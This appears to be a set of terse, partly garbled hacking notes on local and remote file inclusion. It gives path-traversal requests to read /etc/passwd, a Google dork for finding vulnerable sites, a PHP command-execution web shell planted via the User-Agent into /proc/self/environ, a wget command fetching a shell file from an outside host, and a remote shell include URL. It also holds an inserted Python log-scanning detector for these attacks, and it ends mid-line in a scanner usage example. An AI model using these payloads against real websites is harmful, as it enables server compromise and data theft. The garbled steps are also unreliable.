LFI - Local file inclusion
It includes a file from the server and shows it in our browser.
To see if a script is vulnerable to local file inclusion, request:
index.php?page=../../../../../../../../../etc/passwd
That shows the complete user information on that server, with paths.
Here ../ causes the script to move up one directory.
Multiple ../ cause the script to move to the top level directory (/, the root of the
filesystem) and /etc/passwd is the Unix passwd file.
Google dork: inurl:.php?page=
example: www.xxx.com/contacts.php?page=abc.php
test: www.xxx.com/contacts.php?page=../xyz.php
Now, on a Linux server there is /etc/passwd.
1... www.xyz.com/index
../
=../../../etc/passwd
=../../../etc/passwd
etc/passwd file (google)
proc/self/environ is the writable file by end
or var/log/httpd-access.log is also writable
proc/self/environ
add-on: User Agent Switcher
config.php
<?php passthru($_GET['cmd']) ?>
../proc/self//environ&cmd=wget http://t35.com/abc.txt O shell.php
config.php
ip
username
pwd
Done..
----------------------------------------------------------------------------------------------
RFI - Remote file inclusion
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites.
It allows an attacker to include a remote file, usually through a script on the web
server. The vulnerability occurs due to the use of user-supplied input without
proper validation. This can lead to something as minimal as outputting the contents
of the file, but depending on the severity it can also lead to, to list a few:
-> Code execution on the web server
-> Code execution on the client-side such as JavaScript which can lead to other
attacks such as cross site scripting (XSS).
-> Denial of Service (DoS)
-> Data Theft/Manipulation
By default allow_url_include is ON -----> in php.ini
www.xxx.com/contacts.php?page=http://www.abc.com/shell.php
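The requests from the LFI and RFI sections above, seen from the defender's side: an added example (not code from the original post) that scans web-server access logs for traversal sequences, the file paths named above, remote URLs passed in a parameter, and PHP tags in the User-Agent. The combined log format, the finding labels and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx "combined" format: client, request line, status, referer, agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "\S+ (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>.*)"$')
TRAVERSAL = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')
SENSITIVE = re.compile(
    r'(?:^|/)(?:etc/passwd|proc/self/environ|var/log/[^/]*access[._]log)', re.I)
REMOTE = re.compile(r'^\s*(?:https?|ftp)://', re.I)
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)

def fully_decode(value, rounds=3):
    """Undo nested URL-encoding (%252e -> %2e -> .) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the sorted finding labels for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    found = set()
    query = urlsplit(m["target"]).query
    for _name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl has already decoded one layer
        if TRAVERSAL.search(value):
            found.add("traversal")
        if SENSITIVE.search(value):
            found.add("sensitive-file")
        if REMOTE.match(value):
            found.add("remote-include")
    if PHP_TAG.search(m["agent"]):  # code planted in a header the server stores
        found.add("php-in-user-agent")
    return sorted(found)

# Constructed sample lines (documentation addresses and hosts), not real traffic.
SAMPLE = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1543 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /contacts.php?page=http://files.example/inc.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?page=%252e%252e%252fproc%252fself%252fenviron HTTP/1.1" 200 900 "-" "<?php echo 1; ?>"',
    '198.51.100.7 - - [10/Oct/2023:13:58:40 +0000] "GET /contacts.php?page=abc.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line), line.split('"')[1])
```

A hit with status 200 on a traversal or remote-include line is the one to triage first, since it suggests the include parameter accepted the value.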
>> TOOL Descriptions:
FIMAP
FIMAP is a Local and Remote file inclusion auditing Tool (LFI/RFI).
Fimap is a little Python tool which can find, prepare, audit, exploit and even Google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap, just for LFI/RFI bugs instead of SQL injection.
Local File Inclusion Vulnerability Scanner
Description:
The Simple Local File Inclusion Vulnerability Scanner helps you to find LFI vulnerabilities.
This tool is only able to handle “simple” LFI vulnerabilities, but not complex ones.
Usage:
./lfi_scanner.py --url=
Usage example:
./lfi_scanner.py --url="http://www.example.com/page.php?file=mai